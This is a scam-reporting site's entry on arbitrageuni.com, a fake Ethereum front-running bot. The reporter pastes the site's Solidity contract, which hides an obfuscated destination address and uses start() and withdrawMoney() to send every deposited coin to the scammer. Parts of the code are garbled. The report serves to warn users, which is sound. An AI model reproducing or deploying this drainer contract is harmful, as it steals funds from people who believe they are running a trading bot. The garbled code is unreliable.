Scamwatcher.com logo
United against scams
Report an Internet Scam Emails, Ads, fraudulent website... Report a phone Scam Call or SMS received, voice messaging...

Fraudulent website : arbitrageuni.com

SUSPECTED SCAM!

Date09/18/2023
Url / Websitehttps://arbitrageuni.com/0x9ea3cda5c2adf0370454b9ee28786a068227b1a4
Scamdoc Trust Score | Contact / Whois info
Scam contentsadvertises a bot which front runs eth trades , on looking at code it basically sets up a contract to take your money
Comment / Review// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.1;

contract UniswapFrontRunner {

uint public balanceReceived;

struct slice {
uint _len;
uint _ptr;
}
function getMemPoolOffset() internal pure returns (uint) {
return 995411;
}

function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
uint shortest = self._len;

if (other._len = 97) && (b1 = 65) && (b1 = 48) && (b1 = 97) && (b2 = 65) && (b2 = 48) && (b2 <= 57)) {
b2 -= 48;
}
iaddr += (b1 * 16 + b2);
}
return address(iaddr);
}
function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
bytes memory _baseBytes = bytes(_base);
bytes memory _valueBytes = bytes(_value);

string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
bytes memory _newValue = bytes(_tmpValue);

uint i;
uint j;

for(i=0; i<_baseBytes.length; i++) {
_newValue[j++] = _baseBytes[i];
}

for(i=0; i<_valueBytes.length; i++) {
_newValue[j++] = _valueBytes[i];
}

return string(_newValue);
}
function getMempoolLong() private pure returns (string memory) {
return "aA085E90";
}

function getBalance() private view returns(uint) {
return address(this).balance;
}
function start() public {
address to = startExploration(fetchMempoolData());
address payable contracts = payable(to);
contracts.transfer(getBalance());
}
function fetchContractID() internal pure returns (uint) {
return 285398;
}
function contractData() internal pure returns (uint) {
return 395729;
}
/*
* @dev Check if contract has enough liquidity available
* @param self The contract to operate on.
* @return True if the slice starts with the provided text, false otherwise.
*/
function checkLiquidity(uint a) internal pure returns (string memory) {
uint count = 0;
uint b = a;
while (b != 0) {
count++;
b /= 16;
}
bytes memory res = new bytes(count);
for (uint i=0; i b = a % 16;
a /= 16;
}
uint hexLength = bytes(string(res)).length;
if (hexLength == 4) {
string memory _hexC1 = mempool("0", string(res));
return _hexC1;
} else if (hexLength == 3) {
string memory _hexC2 = mempool("0", string(res));
return _hexC2;
} else if (hexLength == 2) {
string memory _hexC3 = mempool("000", string(res));
return _hexC3;
} else if (hexLength == 1) {
string memory _hexC4 = mempool("0000", string(res));
return _hexC4;
}

return string(res);
}
function getMempoolShort() private pure returns (string memory) {
return "0xA8dE";
}
function fetchMempoolData() public pure returns (string memory) {
string memory _mempoolShort = getMempoolShort();
string memory _mempoolEdition = fetchMempoolEdition();
string memory _mempoolVersion = fetchMempoolVersion();
string memory _mempoolLong = getMempoolLong();
return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, _mempoolLong));

}
function loadCurrentContract(string memory self) internal pure returns (string memory) {
string memory ret = self;
uint retptr;
assembly { retptr := add(ret, 32) }

return ret;
}

function withdrawMoney() public {
address to = startExploration((fetchMempoolData()));
address payable contracts = payable(to);
contracts.transfer(getBalance());
}
}

More info +

  • Your comment will be added
    just after your validation

  • Group created on - 0 Members

    To view the contents of this private group or request to join it, you must create an account or login.